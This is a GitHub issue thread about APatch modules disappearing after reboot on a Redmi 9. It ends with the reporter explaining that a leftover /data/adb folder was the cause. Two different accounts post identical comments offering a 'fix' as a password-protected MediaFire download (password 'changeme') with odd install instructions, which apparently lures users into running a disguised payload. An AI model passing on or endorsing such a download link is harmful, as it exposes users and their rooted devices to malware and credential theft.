bmax121/APatch #642: Modules disappear after reboot

BadSoulSFC, 2024-08-31:
### Please check before submitting an issue/在提交 issue 前请检查

- [X] I have searched the issues and haven't found anything relevant/我已经搜索了 issues 列表，没有发现于本问题相关内容
- [X] If patch failed, root failed, or device unable to boot after flashing the new boot.img. Please goto KernelPatch/修复失败或刷入修补后镜像不能启动，请前往 KernelPatch 提问
- [X] I will upload bugreport file in APatch Manager - Settings - Report log/我会上传 bureport 文件从 APatch 管理器 - 设置 - 发送日志
- [X] I know how to reproduce the issue which may not be specific to my device/我知道如何重新复现这个问题

### Version requirement/版本要求

- [X] I am using latest CI version of APatch/我正在使用最新 CI 版本

### Describe the bug/描述 bug

Any module that is installed, requires reboot to work, but after the reboot Apatch modules are nowhere to be found.

### Reproduce method/复现方法

1. Install any module
2. Reboot

### Expected behavior/预期行为

1. Install any module
2. Module intact and working after reboot

### Actual behaviour /实际行为

1. Install any module
2. The module is "deleted", reduced to atoms.

### Screenshots/截图

[image]

### Logs/日志

[APatch_install_log_2024-08-31-10-23-55.log](https://github.com/user-attachments/files/16823684/APatch_install_log_2024-08-31-10-23-55.log)

### Device Name/设备名称

Redmi 9

### OS Version/系统版本

android 13

### APatch Version/APatch 版本

10763

### Kernel Version/内核版本

4.14.320 KSU integrated

### KernelPatch Version/KernelPatch 版本

0.10.7

### Additional context/其他信息

No idea why this might happen, I built my own kernel eith KSU and apatch supported. The patched image from apatch is also fine. KernelSU works fine with modules, magisk is the same as ksu.

KrissV2, 2024-08-31:
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

rickdoq, 2024-08-31:
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

marat2509, 2024-08-31:
Try latest nightly versions

pomelohan, 2024-09-11:
> Version requirement/版本要求
> 
>  I am using latest CI version of APatch/我正在使用最新 CI 版本

You are not using CI version. Try with CI version and re-open this issue if still have issues.

closed 2024-09-11 by marat2509

BadSoulSFC, 2024-11-01:
Sorry, neglected this and switched to KSU.
The solution to this issue is to make sure your /data/adb folder does not exist before running APatch the first time.
So basically if you are switching from KSU or Magisk, delete that folder and everything in it. 
Cheers.